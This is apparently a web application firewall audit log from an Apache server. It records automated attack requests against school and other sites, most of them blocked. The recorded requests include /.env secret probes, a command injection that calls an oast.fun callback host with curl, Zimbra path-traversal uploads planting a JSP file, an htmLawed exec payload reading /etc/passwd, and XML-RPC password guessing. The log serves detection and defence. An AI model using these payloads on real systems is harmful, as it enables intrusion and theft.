Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747881818880284 799 (- - -) Stopwatch2: 1747881818880284 799; combined=381, p1=340, p2=0, p3=0, p4=0, p5=41, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebd10247-Z-- --7801fe11-A-- [22/May/2025:09:43:40 +0700] aC6PXOThJmFSRJ5-OZdf9AAAAEc 103.236.140.4 54272 103.236.140.4 8181 --7801fe11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7801fe11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7801fe11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747881820869063 689 (- - -) Stopwatch2: 1747881820869063 689; combined=289, p1=252, p2=0, p3=0, p4=0, p5=36, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7801fe11-Z-- --4dd73f6a-A-- [22/May/2025:10:02:31 +0700] aC6Tx30O04WKE1HJ5iQHDAAAABU 103.236.140.4 55896 103.236.140.4 8181 --4dd73f6a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.173.200.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.173.200.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4dd73f6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dd73f6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747882951971815 3142 (- - -) Stopwatch2: 1747882951971815 3142; combined=1336, p1=476, p2=832, p3=0, p4=0, p5=28, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dd73f6a-Z-- --c5b21365-A-- [22/May/2025:10:07:38 +0700] aC6U-mfriXjg62qQwE_siAAAAI0 103.236.140.4 56264 103.236.140.4 8181 --c5b21365-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.214.238.62 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.214.238.62 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c5b21365-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5b21365-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747883258011752 783 (- - -) Stopwatch2: 1747883258011752 783; combined=337, p1=278, p2=0, p3=0, p4=0, p5=59, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5b21365-Z-- --0dab731f-A-- [22/May/2025:10:07:38 +0700] aC6U-iektx75wRFPQyiGnAAAAMM 103.236.140.4 56272 103.236.140.4 8181 --0dab731f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.214.238.62 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.214.238.62 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0dab731f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dab731f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747883258970168 796 (- - -) Stopwatch2: 1747883258970168 796; combined=378, p1=339, p2=0, p3=0, p4=0, p5=38, sr=127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dab731f-Z-- --caf94833-A-- [22/May/2025:10:12:42 +0700] aC6WKuThJmFSRJ5-OZdg_gAAAFg 103.236.140.4 56674 103.236.140.4 8181 --caf94833-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.235.128 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.235.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --caf94833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caf94833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747883562291474 843 (- - -) Stopwatch2: 1747883562291474 843; combined=391, p1=350, p2=0, p3=0, p4=0, p5=41, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caf94833-Z-- --4084587b-A-- [22/May/2025:10:16:15 +0700] aC6W_2friXjg62qQwE_sswAAAIA 103.236.140.4 56900 103.236.140.4 8181 --4084587b-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 171 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168480875 --4084587b-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0mbkqa4kqtm561jt3n0zrkxhb54h77kk.oast.fun`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --4084587b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4084587b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747883775159445 3106 (- - -) Stopwatch2: 1747883775159445 3106; combined=2013, p1=464, p2=1480, p3=20, p4=24, p5=25, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4084587b-Z-- --4bbf595f-A-- [22/May/2025:10:30:37 +0700] aC6aXSektx75wRFPQyiHKQAAANU 103.236.140.4 57966 103.236.140.4 8181 --4bbf595f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 142.93.129.190 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --4bbf595f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bbf595f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747884637016946 847 (- - -) Stopwatch2: 1747884637016946 847; combined=345, p1=305, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bbf595f-Z-- --7cb55a4d-A-- [22/May/2025:10:32:22 +0700] aC6axiektx75wRFPQyiHSQAAAMg 103.236.140.4 58138 103.236.140.4 8181 --7cb55a4d-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168481526 --7cb55a4d-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --7cb55a4d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb55a4d-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747884742825594 4670 (- - -) Stopwatch2: 1747884742825594 4670; combined=3399, p1=370, p2=3002, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb55a4d-Z-- --1e344432-A-- [22/May/2025:10:32:22 +0700] aC6axn0O04WKE1HJ5iQHwAAAABQ 103.236.140.4 58142 103.236.140.4 8181 --1e344432-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: sid=foo X-Varnish: 168573714 --1e344432-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --1e344432-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e344432-E-- --1e344432-H-- Message: Access denied with code 403 (phase 2). 
Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747884742832094 3071 (- - -) Stopwatch2: 1747884742832094 3071; combined=1561, p1=460, p2=1070, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e344432-Z-- --70bb8159-A-- [22/May/2025:10:32:22 +0700] aC6axmfriXjg62qQwE_tTgAAAIY 103.236.140.4 58146 103.236.140.4 8181 --70bb8159-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168573717 --70bb8159-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ 
Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --70bb8159-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70bb8159-E-- --70bb8159-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747884742844526 4209 (- - -) Stopwatch2: 1747884742844526 4209; combined=3239, p1=358, p2=2854, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70bb8159-Z-- --6608bd19-A-- [22/May/2025:10:58:38 +0700] aC6g7mfriXjg62qQwE_zogAAAI4 103.236.140.4 41260 103.236.140.4 8181 --6608bd19-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6608bd19-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel.2019 --6608bd19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6608bd19-E-- --6608bd19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747886318606159 5781 (- - -) Stopwatch2: 1747886318606159 5781; combined=4167, p1=491, p2=3501, p3=0, p4=0, p5=102, sr=113, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6608bd19-Z-- --8c80827e-A-- [22/May/2025:11:00:13 +0700] aC6hTWfriXjg62qQwE_0XgAAAJA 103.236.140.4 43282 103.236.140.4 8181 --8c80827e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 478 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8c80827e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelZAP --8c80827e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c80827e-E-- --8c80827e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747886413977048 3805 (- - -) Stopwatch2: 1747886413977048 3805; combined=2772, p1=402, p2=2260, p3=0, p4=0, p5=65, sr=136, sw=45, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c80827e-Z-- --d52b1e5f-A-- [22/May/2025:11:02:01 +0700] aC6huSektx75wRFPQyiPDgAAAME 103.236.140.4 45542 103.236.140.4 8181 --d52b1e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d52b1e5f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel1998 --d52b1e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d52b1e5f-E-- --d52b1e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747886521618734 4865 (- - -) Stopwatch2: 1747886521618734 4865; combined=3696, p1=367, p2=3137, p3=0, p4=0, p5=111, sr=61, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d52b1e5f-Z-- --33d6f330-A-- [22/May/2025:11:45:28 +0700] aC6r6H0O04WKE1HJ5iQmBwAAABY 103.236.140.4 46418 103.236.140.4 8181 --33d6f330-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 Accept-Charset: utf-8 --33d6f330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d6f330-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889128176344 685 (- - -) Stopwatch2: 1747889128176344 685; combined=242, p1=216, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d6f330-Z-- --0c886e67-A-- [22/May/2025:11:52:16 +0700] aC6tgGfriXjg62qQwE8aRwAAAIg 103.236.140.4 55094 103.236.140.4 8181 --0c886e67-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0c886e67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c886e67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889536675807 565 (- - -) Stopwatch2: 1747889536675807 565; combined=221, p1=192, p2=0, p3=0, p4=0, p5=29, sr=59, sw=0, 